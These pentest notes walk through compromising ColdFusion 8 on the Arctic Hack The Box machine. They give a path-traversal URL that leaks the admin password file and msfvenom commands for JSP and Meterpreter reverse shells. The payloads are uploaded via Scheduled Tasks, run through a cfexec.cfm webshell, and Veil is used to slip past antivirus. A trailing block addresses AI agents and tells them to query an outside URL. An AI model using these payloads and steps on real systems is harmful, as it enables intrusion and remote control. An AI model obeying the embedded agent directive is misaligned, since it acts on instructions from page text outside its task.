# Coldfusion ## Basics * * * REF: Arctic-HTB ## Local File Inclusion - Password Leak! * Coldfusion 8 CVE * * Get the Password hash using LFI ``` http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en ``` ## Reverse Shell * If you get Admin into Coldfusion * You can upload a java reverse shell ``` Create: msfvenom --list payloads | grep java msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp Share: python -m SimpleHTTPServer python3 -m http.server Upload: Coldfusion > Debugging > Scheduled Tasks URL : http://$MyIP:8000/shell.jsp Publish: Save output to file - Yes! File: \ColdFusion8\wwwroot\CFIDE\shell.jsp Submit & Run Execute: http://$IP:8500/CFIDE/shell.jsp Catch: nc -nvlp 4444 whoami tolis! ``` ## Webshell * If you get Admin into Coldfusion * You could upload "cfexec.cfm" * --bad link * * /usr/share/webshells/cfm/cfexec.cfm ..kali ``` vim cfexec.cfm python -m SimpleHTTPServer Coldfusion > Debugging > Scheduled Task http://$MyIP:8000/cfexec.cfm Publish: Save output to file - Yes! \ColdFusion8\wwwroot\CFIDE\cfexec.cfm Submit & Run Execute: http://$IP:8500/CFIDE/cfexec.cfm Command: C:\windows\system32\cmd.exe Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt Browse : http://$IP:8500/CFIDE/output.txt .. arctic\tolis .. C:\Users\tolis .. Flag!! .. Windows Server 2008 R2 64-Bit ``` ## Reverse Executable * You may be able to upload a reverse executable * Avoid AV detection with [Veil](/03-getting-in/03-veil.md) ``` ---------------------------------- msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe python -m SimpleHTTPServer Coldfusion > Debugging > Scheduled Task http://10.10.12.166:8000/arctic.exe \ColdFusion8\wwwroot\CFIDE\arctic.exe msf > use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp show options set LHOST 10.10.13.10 set RHOST 4444 RUN http://$IP:8500/CFIDE/cfexec.cfm Command: C:\windows\system32\cmd.exe Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt http://10.10.10.11:8500/CFIDE/output.txt .. Found: 'arctic.exe' .. BLOCKED by Antivirus ---------------------------------- Bypass Antivirus with veil-evasion > veil-evasion >> list >> choose '24'.. Powershell/meterpreter/rev_tcp >> LHOST=$MyIP >> LPORT=4444 >> generate .. 'arctic'.. which makes 'arctic.bat' cp arctic.bat . Coldfusion > Debugging > Scheduled Task http://10.10.12.166:8000/arctic.bat C:\ColdFusion8\wwwroot\CFIDE\arctic.bat http://$IP:8500/CFIDE/cfexec.cfm Command: C:\windows\system32\cmd.exe Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat May need to try this 2-3 Times.. but will work!! MSF - Connected! ``` ## Other: * Also consider: * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/04-webapps/coldfusion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.